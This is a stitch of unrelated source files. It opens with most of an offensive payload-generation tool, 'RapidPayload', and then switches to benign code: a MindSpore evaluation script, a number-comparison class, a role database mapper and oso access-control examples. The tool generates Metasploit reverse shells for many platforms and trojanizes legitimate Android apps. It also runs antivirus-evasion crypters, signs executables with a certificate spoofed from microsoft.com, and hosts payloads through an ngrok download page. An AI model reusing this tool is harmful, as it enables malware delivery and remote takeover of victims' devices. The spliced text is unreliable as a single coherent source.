if platform == 'Linux' and type == '4':
payload= 'linux/x64/meterpreter_reverse_http'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '5':
payload= 'linux/x64/meterpreter_reverse_https'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '6':
payload= 'linux/x64/meterpreter/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '7':
payload= 'linux/x86/shell/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '8':
payload= 'linux/x64/shell/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '9':
payload= 'linux/x86/meterpreter/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '10':
payload= 'linux/x64/meterpreter/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '11':
payload= 'linux/x86/shell/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '12':
payload= 'linux/x64/shell/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Python' and type == '1':
payload= 'python/meterpreter/reverse_http'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '2':
payload= 'python/meterpreter/reverse_https'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '3':
payload= 'python/meterpreter/reverse_tcp'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '4':
payload= 'python/meterpreter/bind_tcp'
format= 'raw'
ext= '.py'
if platform == 'Macosx' and type == '1':
payload= 'osx/x86/shell_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Macosx' and type == '2':
payload= 'osx/x86/shell_bind_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Macosx' and type == '3':
payload= 'osx/x64/meterpreter/bind_tcp'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '4':
payload= 'osx/x64/meterpreter/reverse_tcp'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '5':
payload= 'osx/x64/meterpreter_reverse_http'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '6':
payload= 'osx/x64/meterpreter_reverse_https'
format= 'macho'
ext= '.bin'
if platform == 'Java' and type == '1':
payload= 'java/meterpreter/reverse_http'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '2':
payload= 'java/meterpreter/reverse_https'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '3':
payload= 'java/meterpreter/reverse_tcp'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '4':
payload= 'java/meterpreter/bind_tcp'
format= 'jar'
ext= '.jar'
if platform == 'Apple_ios' and type == '1':
payload= 'apple_ios/aarch64/meterpreter_reverse_http'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '2':
payload= 'apple_ios/aarch64/meterpreter_reverse_https'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '3':
payload= 'apple_ios/aarch64/meterpreter_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '4':
payload= 'apple_ios/aarch64/shell_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '5':
payload= 'apple_ios/armle/meterpreter_reverse_http'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '6':
payload= 'apple_ios/armle/meterpreter_reverse_https'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '7':
payload= 'apple_ios/armle/meterpreter_reverse_tcp'
format= 'macho'
ext= '.macho'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -f'+format+' -o '+nameFile+ext)
os.system('sudo chmod +x '+nameFile+ext)
sleep(3)
def legit(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
direct = input("\n{0}{1}RapidPayload:~/Path_of_your_APK# {2}".format(cyan, bold, end))
newname = input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
if platform == 'Android' and type == '1':
payload= 'android/meterpreter/reverse_http'
ext= '.apk'
if platform == 'Android' and type == '2':
payload= 'android/meterpreter/reverse_https'
ext= '.apk'
if platform == 'Android' and type == '3':
payload= 'android/meterpreter/reverse_tcp'
ext= '.apk'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' -x '+direct+' LHOST='+lhost+' LPORT='+lport+' -o '+newname+ext)
sleep(3)
def Normal(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
newname = input("\n{0}{1}RapidPayload:~/FileName# {2}".format(cyan, bold, end))
if platform == 'Android' and type == '1':
payload= 'android/meterpreter/reverse_http'
ext= '.apk'
if platform == 'Android' and type == '2':
payload= 'android/meterpreter/reverse_https'
ext= '.apk'
if platform == 'Android' and type == '3':
payload= 'android/meterpreter/reverse_tcp'
ext= '.apk'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -o '+newname+ext)
print("\n\033[1m\033[36m#|signing APK|#\n\033[1m\033[36m")
os.system("keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000")
os.system('jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore '+newname+ext+' alias_name')
os.system("rm -rf my-release-key.keystore")
sleep(3)
def Ngrok():
print("\033[1m\033[36m")
os.system("ls")
print("")
name1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
def index_defaultNgrok():
with open("index.html", "w") as file:
file.write("""
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- AngelSecurityTeam -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.btn {
background-color: DodgerBlue;
border: none;
color: white;
padding: 12px 30px;
cursor: pointer;
font-size: 20px;
}
.btn:hover {
background-color: RoyalBlue;
}
</style>
<title></title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
</head>
<body>
<div class="wrapper">
<center>
<!-- AngelSecurityTeam -->
<input type="submit" class="btn" style="width:40%" class="fa fa-download" class="BotonDown" value="Download" onclick="document.location.href='"""+name1+"""' ">
</center>
</a>
</div>
</body>
</html>
""")
index_defaultNgrok()
#http.server 80
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
os.system("chmod +x ngrok")
#http.server 80 NGROK
portN=80
os.system("./ngrok http {} > /dev/null &".format(portN))
sleep(8)
os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
urlFile = open('link2.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n\033[1m\033[36mRapidPayload:~/LinkNgrok# \033[1m\033[0m"+url)
print(" ")
def localhost():
print("\033[1m\033[36m")
os.system("ls")
print("")
name2=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
def index_defaultlocalhost():
with open("index.html", "w") as file:
file.write("""
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- AngelSecurityTeam -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.btn {
background-color: DodgerBlue;
border: none;
color: white;
padding: 12px 30px;
cursor: pointer;
font-size: 20px;
}
.btn:hover {
background-color: RoyalBlue;
}
</style>
<title></title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
</head>
<body>
<div class="wrapper">
<center>
<!-- AngelSecurityTeam -->
<input type="submit" class="btn" style="width:40%" class="fa fa-download" class="BotonDown" value="Download" onclick="document.location.href='"""+name2+"""' ">
</center>
</a>
</div>
</body>
</html>
""")
index_defaultlocalhost()
#http.server 80
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
print("\n\033[1m\033[36mRapidPayload:~/Link_LocalHost# \033[1m\033[0m"+"http://localhost:80")
print(" ")
def MSF():
host1=input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
port1=input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
payload1=input("\n{0}{1}RapidPayload:~/PAYLOAD# {2}".format(cyan, bold, end))
datamsf = "use exploit/multi/handler;set PAYLOAD "+payload1+";set LHOST "+host1+";set LPORT "+port1+";run"
subprocess.call(["msfconsole", "-q" ,"-x", datamsf])
def RapidP():
select = input('\n{2}{0}{2}[{1}{2}1{0}]{2}{1} {2} Windows\n{0}{2}[{1}{2}2{2}{0}]{1} {2} Linux\n{0}{2}[{1}{2}3{2}{0}]{1} {2} Android\n{0}{2}[{1}{2}{2}4{0}]{1} {2} Python\n{0}{2}[{1}{2}{2}5{0}]{1} {2} MacOS\n{0}{2}[{1}{2}{2}6{0}]{1} {2} Java\n{0}{2}[{1}{2}{2}7{0}]{1} {2} Apple_ios\n{0}{2}[{1}{2}{2}8{0}]{1} {2} Connect_Ngrok\n{0}{2}[{1}{2}{2}9{0}]{1} {2} Connect_LocalHost\n{0}{2}[{1}{2}{2}10{0}]{1} {2}Connect_MSF\n{0}{0}[{1}{2}0{0}]{1} {2} Exit\n\n{0}{2}RapidPayload:~#{1} '.format(cyan, end, bold))
if select == '1':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}windows/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}windows/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}windows/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}windows/meterpreter/bind_tcp\n{0}[{1}{2}5{0}]{1} {2}windows/shell/bind_tcp\n{0}[{1}{2}6{0}]{1} {2}windows/shell/reverse_tcp\n{0}[{1}{2}7{0}]{1} {2}Crypter_Shellter\n{0}[{1}{2}8{0}]{1} {2}Signs_EXE\n{0}[{1}{2}9{0}]{1} {2}Crypter_Hyperion\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Windows#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
elif type == '7':
print("\n{0}{1}RapidPayload:~/{2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("wine "+dirtt+"shellter.exe")
print("\n{0}{1}RapidPayload:~/{2}".format(cyan, bold, end))
elif type == '8':
print("\033[1m\033[36m")
os.system("ls")
wi1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
wi2=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("python3 "+dirtt+"signs.py www.microsoft.com 443 "+wi1+" "+wi2+".exe")
os.system("rm -rf certs")
print("\033[1m\033[36m")
os.system("ls")
os.system("chmod +x "+wi2+".exe")
elif type == '9':
print("\033[1m\033[36m")
os.system("ls")
wi11=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
wi22=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
os.system("cp -r "+dirtt+"/Hyperion/Fasm "+dirtt+"/")
os.system("cp -r "+dirtt+"/Hyperion/Src "+dirtt+"/")
os.system("cp "+dirtt+"/Hyperion/hyperion.exe "+dirtt+"/")
print("\033[1m\033[36m")
os.system("wine hyperion.exe "+wi11+" "+wi22+".exe")
print("\033[1m\033[36m")
os.system("ls")
os.system("rm -rf Fasm")
os.system("rm -rf Src")
os.system("rm -rf hyperion.exe")
else:
main('Windows', type)
if select == '2':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2} linux/x86/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2} linux/x86/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2} linux/x86/meterpreter/reverse_tcp{0}{1}\n{0}[{1}{2}4{0}]{1} {2} linux/x64/meterpreter/reverse_http{0}{1}\n{0}[{1}{2}5{0}]{1} {2} linux/x64/meterpreter/reverse_https{0}{1}\n{0}[{1}{2}6{0}]{1} {2} linux/x64/meterpreter/reverse_tcp\n{0}[{1}{2}7{0}]{1} {2} linux/x86/shell/reverse_tcp{0}\n{0}[{1}{2}8{0}]{1} {2} linux/x64/shell/bind_tcp\n{0}[{1}{2}9{0}]{1} {2} linux/x86/meterpreter/bind_tcp\n{0}[{1}{2}10{0}]{1} {2}linux/x64/meterpreter/bind_tcp\n{0}[{1}{2}11{0}]{1} {2}linux/x86/shell/bind_tcp\n{0}[{1}{2}12{0}]{1} {2}linux/x64/shell/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2} Menu\n\n{0}{2}RapidPayload:~/Linux#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Linux', type)
if select == '3':
droi = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}Normal\n{0}[{1}{2}2{0}]{1} {2}Infect Legitimate APK\n{0}{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if droi == '1':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}android/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}android/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}android/meterpreter/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
Normal('Android', type)
if droi == '2':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}android/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}android/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}android/meterpreter/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
legit('Android', type)
if select == '4':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}python/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}python/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}python/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}python/meterpreter/bind_tcp\n{0}[{1}{2}5{0}]{1} {2}Crypter_FUD\n{0}[{1}{2}6{0}]{1} {2}Crypter_NXcrypter\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Python#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
elif type == '5':
print("\033[1m\033[36m")
os.system("ls")
print("")
namepyfud=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("chmod +x "+dirtt+"py_fud.py")
os.system("python "+dirtt+"py_fud.py "+namepyfud)
print("\n{0}{1}RapidPayload:~/Save#FUD_python_RapidPayload.py {2}".format(cyan, bold, end))
elif type == '6':
print("\033[1m\033[36m")
os.system("ls")
print("")
namepyfud1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
namepyfud2=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("chmod +x "+dirtt+"nx.py")
os.system("python "+dirtt+"nx.py --file="+namepyfud1+" --out="+namepyfud2+".py")
print("\033[1m\033[36m")
os.system("ls")
os.system("chmod +x "+namepyfud2+".py")
else:
main('Python', type)
if select == '5':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}osx/x86/shell_reverse_tcp\n{0}[{1}{2}2{0}]{1} {2}osx/x86/shell_bind_tcp\n{0}[{1}{2}3{0}]{1} {2}osx/x64/meterpreter/bind_tcp\n{0}[{1}{2}4{0}]{1} {2}osx/x64/meterpreter/reverse_tcp\n{0}[{1}{2}5{0}]{1} {2}osx/x64/meterpreter_reverse_http\n{0}[{1}{2}6{0}]{1} {2}osx/x64/meterpreter_reverse_https\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/MacOS#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Macosx', type)
if select == '6':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}java/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}java/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}java/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}java/meterpreter/bind_tcp\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Java#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Java', type)
if select == '7':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_http\n{0}[{1}{2}2{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_https\n{0}[{1}{2}3{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}apple_ios/aarch64/shell_reverse_tcp\n{0}[{1}{2}5{0}]{1} {2}apple_ios/armle/meterpreter_reverse_http\n{0}[{1}{2}6{0}]{1} {2}apple_ios/armle/meterpreter_reverse_https\n{0}{2}[{1}{2}1{0}]{1} {2}apple_ios/armle/meterpreter_reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Apple_ios#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Apple_ios', type)
if select == '8':
Ngrok()
if select == '9':
localhost()
if select == '10':
MSF()
elif select == '0':
print("\n")
os.system("fuser -k -n tcp 80") # kill PORT 80
exit(0)
else:
sleep(2)
banner()
RapidP()
if __name__ == "__main__":
try:
banner()
RapidP()
except KeyboardInterrupt:
print("\n")
exit(0)
| 44.804979 | 810 | 0.533941 |
f0801b7de6532b77a49b919db668beaa5aa03cd5
| 2,853 |
py
|
Python
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
"""Precision calculation function of Ubuntu data"""
def get_p_at_n_in_m(data, n, m, ind):
"""Former n recall rate"""
pos_score = data[ind][0]
curr = data[ind:ind + m]
curr = sorted(curr, key=lambda x: x[0], reverse=True)
if curr[n - 1][0] <= pos_score:
return 1
return 0
def evaluate(file_path):
"""
Evaluation is done through a score file.
:param file_path: Score file path.
:return: A tuple of accuracy
"""
data = []
with open(file_path, 'r') as file:
for line in file:
line = line.strip()
tokens = line.split("\t")
if len(tokens) != 2:
continue
data.append((float(tokens[0]), int(tokens[1])))
# assert len(data) % 10 == 0
p_at_1_in_2 = 0.0
p_at_1_in_10 = 0.0
p_at_2_in_10 = 0.0
p_at_5_in_10 = 0.0
length = int(len(data) / 10)
for i in range(0, length):
ind = i * 10
assert data[ind][1] == 1
p_at_1_in_2 += get_p_at_n_in_m(data, 1, 2, ind)
p_at_1_in_10 += get_p_at_n_in_m(data, 1, 10, ind)
p_at_2_in_10 += get_p_at_n_in_m(data, 2, 10, ind)
p_at_5_in_10 += get_p_at_n_in_m(data, 5, 10, ind)
return (p_at_1_in_2 / length, p_at_1_in_10 / length, p_at_2_in_10 / length, p_at_5_in_10 / length)
def evaluate_m(logits, labels):
"""
Evaluate through network output.
:param logits: Network score.
:param labels: Actual label
:return: A tuple of accuracy
"""
data = []
for i in range(len(logits)):
data.append((float(logits[i]), int(labels[i])))
# assert len(data) % 10 == 0
p_at_1_in_2 = 0.0
p_at_1_in_10 = 0.0
p_at_2_in_10 = 0.0
p_at_5_in_10 = 0.0
length = int(len(data) / 10)
for i in range(0, length):
ind = i * 10
assert data[ind][1] == 1
p_at_1_in_2 += get_p_at_n_in_m(data, 1, 2, ind)
p_at_1_in_10 += get_p_at_n_in_m(data, 1, 10, ind)
p_at_2_in_10 += get_p_at_n_in_m(data, 2, 10, ind)
p_at_5_in_10 += get_p_at_n_in_m(data, 5, 10, ind)
return (p_at_1_in_2 / length, p_at_1_in_10 / length, p_at_2_in_10 / length, p_at_5_in_10 / length)
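# --- Added sanity check: one batch of 10 candidates with the positive response
# listed (and scored) first, so all four metrics come out as 1.0. ---
if __name__ == "__main__":
    scores = [0.9, 0.1, 0.2, 0.3, 0.05, 0.4, 0.15, 0.25, 0.35, 0.45]
    labels = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    print(evaluate_m(scores, labels))  # (1.0, 1.0, 1.0, 1.0)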
| 29.112245 | 102 | 0.609534 |
0411d539c0ed6a946aa0e8a373b3d59fb4edc3cf
| 990 |
py
|
Python
|
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | 1 |
2019-10-29T08:21:41.000Z
|
2019-10-29T08:21:41.000Z
|
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | null | null | null |
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | null | null | null |
from functools import total_ordering
import numbers
@total_ordering
class Number_extended:
def __init__(self,value,side=None):
self.v=value
self.side=side
def __eq__(self,other):
if isinstance(other,numbers.Number):
return self.v==other and self.side==None
elif isinstance(other,Number_extended):
return self.v==other.v and self.side==other.side
def __lt__(self,other):
if isinstance(other,numbers.Number):
return (self.v<other or
(self.v==other and self.side==-1))
elif isinstance(other,Number_extended):
return (self.v<other.v or
(self.v==other.v and
                 (self.side,other.side) in ((-1,None),(-1,+1),(None,+1))))
    def __add__(self, other):
        # Added so the demo below runs; assumed semantics: adding a plain
        # number shifts the value and preserves the side marker.
        if isinstance(other, numbers.Number):
            return Number_extended(self.v + other, self.side)
        return NotImplemented
    __radd__ = __add__
    def __repr__(self):
        return "Number_extended({!r}, {!r})".format(self.v, self.side)
a = Number_extended(5,+1)
print("a<5 ", a<5)
print("a>5 ", a>5)
print("a==5", a==5)
print("5>a ", 5>a)
print("5<a ", 5<a)
print("5==a", 5==a)
print("a==a", a==a)
print("a<a ", a<a)
print("a<=a", a<=a)
print("a+1 ", a+1)
| 29.117647 | 73 | 0.579798 |
f0e76a10944b6a5331226c127a51572d884114b4
| 3,165 |
py
|
Python
|
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
import mysql.connector
from server.Role import Role
from server.db.Mapper import Mapper
class RoleMapper (Mapper):
"""This is a mapper-class, which represents role objects into
a relational database. For this reason you can find some methods,
which help to find, insert, modify, and delete objects. The mapping is
bidirectional, which means objects can be transformed into database structures
and the other way around"""
def __init__(self):
super().__init__()
def find_all(self):
"""Reads out all roles.
        :return A collection of role objects that represent all roles.
"""
result = []
cursor = self._connection.cursor()
cursor.execute("SELECT * FROM Role")
tuples = cursor.fetchall()
for (id, name) in tuples:
role = Role()
role.set_id(id)
role.set_name(name)
result.append(role)
self._connection.commit()
cursor.close()
return result
def find_by_id(self, id):
"""Reads out one role by id.
:param id Unique id of the role
:return A role object, which has the required id.
"""
result = None
cursor = self._connection.cursor()
command = "SELECT * FROM Role WHERE id={}".format(id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, name) in tuples:
role = Role()
role.set_id(id)
role.set_name(name)
result = role
self._connection.commit()
cursor.close()
return result
def insert(self, role):
"""Adds a role object into the database.
The primary key of the object gets checked and if neccessary adjusted.
:param role object which will be saved
:return role object with the changed id
"""
cursor = self._connection.cursor()
cursor.execute("SELECT MAX(id) AS maxid FROM Role")
tuples = cursor.fetchall()
        for (maxid,) in tuples:
            if maxid is not None:
                role.set_id(maxid + 1)
            else:
                role.set_id(1)
command = "INSERT INTO Role (id, name) VALUES (%s,%s)"
data = (role.get_id(), role.get_name())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
return role
def update(self, role):
"""Updates a role object in the database.
:param role object which will be updated
"""
cursor = self._connection.cursor()
command = "UPDATE Role " + "SET name=%s WHERE id=%s"
data = (role.get_name(), role.get_id())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
def delete(self, role):
"""Deletes a role object from the database.
:param role object which will be deleted
"""
cursor = self._connection.cursor()
command = "DELETE FROM Role WHERE id={}".format(role.get_id())
cursor.execute(command)
self._connection.commit()
cursor.close()
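# --- Hedged usage sketch (added; assumes the Mapper base class opens
# self._connection to a live MySQL database containing a Role table, which is
# why it is left commented out):
#
#     mapper = RoleMapper()
#     admin = Role(); admin.set_name("admin")
#     admin = mapper.insert(admin)              # id assigned as MAX(id) + 1
#     print(mapper.find_by_id(admin.get_id()))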
| 29.036697 | 82 | 0.580095 |
9bf912a03a898b6c2d47184fcf45a74ca52c39d4
| 303 |
py
|
Python
|
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | 2 |
2018-04-12T14:24:33.000Z
|
2020-09-16T07:03:28.000Z
|
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
from collision import find_collision
from predict import predict
from read import read_data
from interpolate import interpolate
from show import show
from parser import parse
import time
DANGER_PATH = ".danger/"
while True:
parse("Seretra/Prediction/main.srt")
print("done")
time.sleep(1)
| 20.2 | 40 | 0.775578 |
acc11e32a302cb938903ff9dcab5418db04048e1
| 638 |
py
|
Python
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto  # standard XSOAR script scaffolding; provides demisto.args()
from CommonServerPython import *
asset_identifier = demisto.args().get('asset_identifier')
asset_identifier_type = 'Host Name'
if is_mac_address(asset_identifier):
asset_identifier_type = 'MAC Address'
if is_ip_valid(asset_identifier, accept_v6_ips=True):
asset_identifier_type = 'IP Address'
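# Anything that is neither a valid MAC nor an IP keeps the 'Host Name' default.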
result = demisto.executeCommand('gcb-list-events',
{
'asset_identifier': asset_identifier,
'asset_identifier_type': asset_identifier_type
}
)
demisto.results(result)
| 35.444444 | 82 | 0.589342 |
acc7c909cc3147f22fe103a85af5063c26ab266a
| 3,259 |
py
|
Python
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 1 |
2021-07-08T17:36:08.000Z
|
2021-07-08T17:36:08.000Z
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 2 |
2021-03-24T19:24:40.000Z
|
2021-03-24T19:54:46.000Z
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 1 |
2021-03-24T19:51:45.000Z
|
2021-03-24T19:51:45.000Z
|
"""
Example application integrated with oso.
The application does not currently do much except define application
